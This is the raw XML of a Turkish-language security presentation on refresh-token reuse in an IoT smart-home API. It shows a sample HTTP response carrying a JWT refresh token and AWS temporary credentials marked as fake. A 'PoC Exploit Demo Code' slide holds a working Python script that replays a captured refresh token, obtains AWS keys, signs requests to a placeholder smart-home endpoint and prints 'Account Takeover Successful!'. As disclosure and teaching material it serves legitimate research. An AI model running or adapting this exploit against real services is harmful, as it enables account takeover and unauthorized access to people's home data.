            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="700">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Google Shape;270;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="390575"/>
            <a:ext cx="3000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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Demo Request:</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;271;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5361975" y="328675"/>
            <a:ext cx="3000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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Demo Response:</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5501200" y="635650"/>
            <a:ext cx="3041100" cy="4381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HTTP/2 200 OK</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Content-Type: application/json</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Content-Length: 1649</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Date: Sat, 10 May 2025 17:55:09 GMT</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X-Amzn-Trace-Id: Root=1-00000000-fedcba9876543210abcdef12</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X-Amzn-Requestid: abcd1234-efgh-5678-ijkl-9012mnopqrst</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X-Amz-Apigw-Id: apiGatewayId789xyz</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X-Cache: Miss from cloudfront</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Via: 1.1 anotheredge098765.cloudfront.net (CloudFront)</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X-Amz-Cf-Pop: DEMO45-X1</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X-Amz-Cf-Id: 1122AABBCCDDEEFF998877665544332211QQWWXXYYZZ</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"success": true,</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"code": "0",</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"description": "Refresh successful",</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"data": {</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"refreshToken": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyZWZyZXNoQ291bnQiOjI4LCJpc3MiOiJjb21wYW55aW90IiwiZGV2aWNlSWQiOi0xMjM0NTY3ODkwMTIzNCwiZW1haWwiOiIweGZyZDFndWxAZ21haWwuY29tIn0.fakeJWTsig2",</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"credentials": {</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"accessKey": "FAKEACCESSKEYZXCV098765",</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"secretKey": "FakeSecret987zyxwvut3210ABCDEF654321",</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"sessionToken": "FAKESESSIONTOKEN..sampleTokenChunk..LMNOPQRSTU09876==",</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"expiration": 1746903309000</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  }</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rPr b="0" i="0" lang="en" sz="700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="7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700"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Google Shape;273;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279" name="Google Shape;279;p3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solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="280" name="Google Shape;280;p39" title="burp.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1197650" y="540227"/>
            <a:ext cx="6748700" cy="4063024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717100" y="1265825"/>
            <a:ext cx="9459900" cy="7926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1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>📦 PoC: Refresh Token Reuse</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Bu slayt, şu işlemleri yapan bir gösteri betiği içermektedir:</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295275" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1050"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Yetkili bir oturumdan geçerli bir yineleme belirteci yakalar</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Yeni erişim belirteçleri oluşturmak için belirteci yeniden kullanır</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Kullanıcı etkileşimi olmadan kimliği doğrulanmış API çağrıları yürütür</a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>** Not: Etik nedenlerden dolayı, bu slaytta hiçbir hassas bilgi veya üretim belirteci yer almamaktadır.**</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ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272825" y="200350"/>
            <a:ext cx="9459900" cy="79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2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>import requests</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import time</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from requests_aws4auth import AWS4Auth</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chemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ✅ Yakalanan refresh token, JWT yapısında</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>REFRESH_TOKEN = "&lt;REFRESH_TOKEN&gt;"</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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ✅ Kimlik yenileme ve veri çekme uç noktaları</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AUTH_ENDPOINT = "https://api.&lt;companyiot.com&gt;/auth/refresh-token"</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DATA_ENDPOINT = "https://smarthome.&lt;companyiot.com&gt;/my-homes"</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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ✅ Uygulama içi yaygın header yapısı (User-Agent + meta veriler)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>common_headers = {</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"Content-Type": "application/json",</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"User-Agent": "aws-sdk-iOS/2.40.1",</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"X-&lt;Comp&gt;-Env": "LIVE",  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ✅ Ortam bilgisi: Canlı sunucuya erişim</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    "X-&lt;Comp&gt;-Build-Meta": "iOS-18.3.1-PH-PROD-STD-3.1.29-P-&lt;Mobile-IoTApp&gt;"  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ✅ Uygulama versiyonu &amp; platform bilgisi</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</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for i in range(2):</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print(f"\n🔄 Iteration {i+1}")</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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    # ✅ JWT ile kimlik yenileme isteği</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    payload = {</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"refreshToken": REFRESH_TOKEN,</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"devicePlatform": "iOS"</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auth_resp = requests.post(AUTH_ENDPOINT, json=payload, headers=common_headers)</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if auth_resp.status_code != 200:</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print(f"❌ Refresh token failed: {auth_resp.status_code}")</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continue</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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    # ✅ AWS temporary credentials çekiliyor</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    creds = auth_resp.json()["data"]["credentials"]</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access_key = creds["accessKey"]</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secret_key = creds["secretKey"]</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session_token = creds["sessionToken"]</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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    # ✅ AWS imzalı istek için yetkilendirme</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    aws_auth = AWS4Auth(access_key, secret_key, "eu-west-1", "execute-api", session_token=session_token)</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chemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    # ✅ Kullanıcının IoT ev verisine yetkisiz erişim</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    api_resp = requests.get(DATA_ENDPOINT, auth=aws_auth, headers=common_headers)</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if api_resp.status_code == 200:</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print(f"✅ Account Takeover Successful! Response:\n{api_resp.text[:]}...")</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else:</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print(f"❌ API access failed: {api_resp.status_code}")</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    time.sleep(1)</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l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="500">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>print("\nTest completed.")</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="500">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Google Shape;293;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188575" y="2340900"/>
            <a:ext cx="34326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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>PoC Exploit Demo Code</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Google Shape;294;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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5669450" y="2192950"/>
            <a:ext cx="34326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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>PoC Result</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="300" name="Google Shape;300;p42" title="terminal.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="554475" y="1389350"/>
            <a:ext cx="4883775" cy="2364775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;301;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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2114950" y="1925250"/>
            <a:ext cx="55404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7200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="7200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>ICS Security</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="7200" u="none" cap="none" strike="noStrike">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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="dk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nvGrpSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="2472008"/>
            <a:ext cx="9144000" cy="2671492"/>
            <a:chOff x="0" y="3296011"/>
            <a:chExt cx="12192000" cy="3561989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="111" name="Google Shape;111;p17"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="3681702"/>
              <a:ext cx="12192000" cy="3176298"/>
              <a:chOff x="0" y="3681702"/>
              <a:chExt cx="12192000" cy="3176298"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="112" name="Google Shape;112;p17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="3681702"/>
                <a:ext cx="12192000" cy="3176298"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="3176298" w="12192000">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dk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3" name="Google Shape;113;p17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="3681702"/>
                <a:ext cx="12192000" cy="3176298"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="3176298" w="12192000">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lt1">
                  <a:alpha val="13725"/>
                </a:schemeClr>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114" name="Google Shape;114;p17"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="544" y="3296011"/>
              <a:ext cx="12191048" cy="2849880"/>
              <a:chOff x="544" y="3296011"/>
              <a:chExt cx="12191048" cy="2849880"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115" name="Google Shape;115;p17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="544" y="3296011"/>
                <a:ext cx="12191048" cy="2849880"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="1424940" w="6095524">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6" name="Google Shape;116;p17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="544" y="3296011"/>
                <a:ext cx="12191048" cy="2849880"/>
              </a:xfrm>
              <a:custGeom>
                <a:rect b="b" l="l" r="r" t="t"/>
                <a:pathLst>
                  <a:path extrusionOk="0" h="1424940" w="6095524">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rotWithShape="1">
                <a:blip r:embed="rId3">
                  <a:alphaModFix amt="57000"/>
                </a:blip>
                <a:tile algn="tl" flip="none" tx="0" sx="100000" ty="0" sy="100000"/>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sp>
